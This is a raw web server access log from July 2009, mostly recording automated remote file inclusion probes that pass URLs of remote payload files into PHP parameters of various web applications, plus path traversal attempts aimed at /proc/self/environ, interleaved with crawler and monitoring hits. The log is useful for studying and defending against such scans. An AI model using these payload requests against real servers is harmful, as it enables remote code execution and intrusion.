84.207.17.120 - - [12/Jul/2009:02:37:40 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
222.236.47.192 - - [12/Jul/2009:02:38:34 -0400] "GET //errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:38:34 -0400] "GET /logs/access_log.Q109063000//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:38:34 -0400] "GET /logs//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:38:40 -0400] "GET /logs/error_log.Q109063000//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
141.223.5.12 - - [12/Jul/2009:02:38:52 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
89.223.3.98 - - [12/Jul/2009:02:39:00 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:39:00 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:39:05 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:02:39:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [12/Jul/2009:02:39:23 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:39:25 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:39:31 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:40:08 -0400] "GET /logs/access_log.Q109063000//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:02:40:29 -0400] "GET /logs/access_log.Q109062900//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:02:40:29 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:02:40:30 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
209.172.33.230 - - [12/Jul/2009:02:40:39 -0400] "GET /logs//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Jul/2009:02:40:39 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Jul/2009:02:40:39 -0400] "GET //index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Jul/2009:02:40:55 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
87.230.35.175 - - [12/Jul/2009:02:41:13 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:02:41:14 -0400] "GET /logs//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:02:41:14 -0400] "GET //index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:28 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:28 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:28 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:33 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:41 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:41 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:41 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:41:42 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:41:42 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:41:42 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.24.49.35 - - [12/Jul/2009:02:41:48 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:02:41:54 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:42:14 -0400] "GET /logs/access_log.Q109062300/index.php?meio=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.130.6.10 - - [12/Jul/2009:02:44:00 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Opera/9.25 (Windows NT 5.1; U; en)"
203.130.6.10 - - [12/Jul/2009:02:44:00 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Opera/9.25 (Windows NT 5.1; U; en)"
203.130.6.10 - - [12/Jul/2009:02:44:17 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Opera/9.25 (Windows NT 5.1; U; en)"
203.130.6.10 - - [12/Jul/2009:02:44:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Opera/9.25 (Windows NT 5.1; U; en)"
209.51.133.202 - - [12/Jul/2009:02:44:22 -0400] "GET /index.php?arquivo=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:44:22 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:44:22 -0400] "GET /logs/index.php?arquivo=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:44:22 -0400] "GET /logs/access_log.Q109051400/index.php?arquivo=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:02:44:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:02:45:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0193194E98E320008E31059+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.115.111.251 - - [12/Jul/2009:02:45:12 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.230.35.175 - - [12/Jul/2009:02:45:55 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:45:56 -0400] "GET //index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:45:56 -0400] "GET /logs//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:45:58 -0400] "GET //index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:45:59 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:46:00 -0400] "GET /logs//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.51.133.202 - - [12/Jul/2009:02:46:09 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?arquivo=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:46:10 -0400] "GET /logs/access_log.Q109051400%20%20/index.php?arquivo=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:02:46:20 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:46:26 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
84.207.17.120 - - [12/Jul/2009:02:48:12 -0400] "GET /logs/error_log.Q109062900//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
209.59.12.99 - - [12/Jul/2009:02:49:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.253.240.80 - - [12/Jul/2009:02:50:29 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:50:29 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:50:29 -0400] "GET /logs/access_log.Q109063000//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:50:48 -0400] "GET /logs/error_log.Q109063000//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:51:04 -0400] "GET /logs/error_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
72.30.78.244 - - [12/Jul/2009:02:51:07 -0400] "GET /images/_notes/nav_lower_blue.jpg.mno HTTP/1.0" 200 252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.253.240.80 - - [12/Jul/2009:02:51:19 -0400] "GET /logs/access_log.Q109053100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:51:19 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
87.230.35.175 - - [12/Jul/2009:02:51:43 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.149.163.198 - - [12/Jul/2009:02:51:58 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:02:51:58 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:02:51:58 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:02:51:58 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
87.230.35.175 - - [12/Jul/2009:02:51:59 -0400] "GET /logs/access_log.Q109070800%20%20//index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.149.163.198 - - [12/Jul/2009:02:51:59 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 241 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:02:51:59 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:02:52:00 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "XXXXXX"
62.149.163.198 - - [12/Jul/2009:02:52:00 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
208.115.111.251 - - [12/Jul/2009:02:52:04 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
89.253.240.80 - - [12/Jul/2009:02:52:04 -0400] "GET /logs/access_log.Q109061600//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
208.115.111.251 - - [12/Jul/2009:02:52:09 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
89.253.240.80 - - [12/Jul/2009:02:52:12 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:52:12 -0400] "GET /logs/error_log.Q109053100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
208.115.111.251 - - [12/Jul/2009:02:52:14 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
89.253.240.80 - - [12/Jul/2009:02:52:18 -0400] "GET /logs/access_log.Q109070100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:52:18 -0400] "GET /logs/error_log.Q109061600//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
208.115.111.251 - - [12/Jul/2009:02:52:19 -0400] "GET /logs/ HTTP/1.1" 200 9190 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.251 - - [12/Jul/2009:02:52:24 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
89.253.240.80 - - [12/Jul/2009:02:52:25 -0400] "GET /logs/error_log.Q109070100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:52:25 -0400] "GET /logs/access_log.Q109051500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:52:30 -0400] "GET /logs/access_log.Q109052100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:53:02 -0400] "GET /logs/access_log.Q109063000%20//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:02:53:08 -0400] "GET /logs/access_log.Q109052100%20//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:02:54:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.51.133.202 - - [12/Jul/2009:02:55:20 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:02:56:54 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:56:55 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:56:59 -0400] "GET /logs/access_log.Q109060400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:57:00 -0400] "GET /logs/access_log.Q109060400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
209.51.133.202 - - [12/Jul/2009:02:57:26 -0400] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:02:57:31 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:57:32 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:57:32 -0400] "GET /logs/access_log.Q109060400//index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:57:33 -0400] "GET /logs/access_log.Q109061700//index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.124.127.34 - - [12/Jul/2009:02:57:55 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:57:55 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:57:55 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:58:02 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:58:02 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:58:02 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:02:58:08 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:58:09 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
211.236.242.164 - - [12/Jul/2009:02:58:11 -0400] "GET /logs/access_log.Q109061700//index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.236.47.192 - - [12/Jul/2009:02:58:11 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:58:11 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:58:11 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:02:58:13 -0400] "GET /logs/access_log.Q109060400//index.php?INCLUDE_FOLDER=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.236.47.192 - - [12/Jul/2009:02:58:20 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:58:20 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:58:20 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:58:27 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:58:27 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:58:27 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
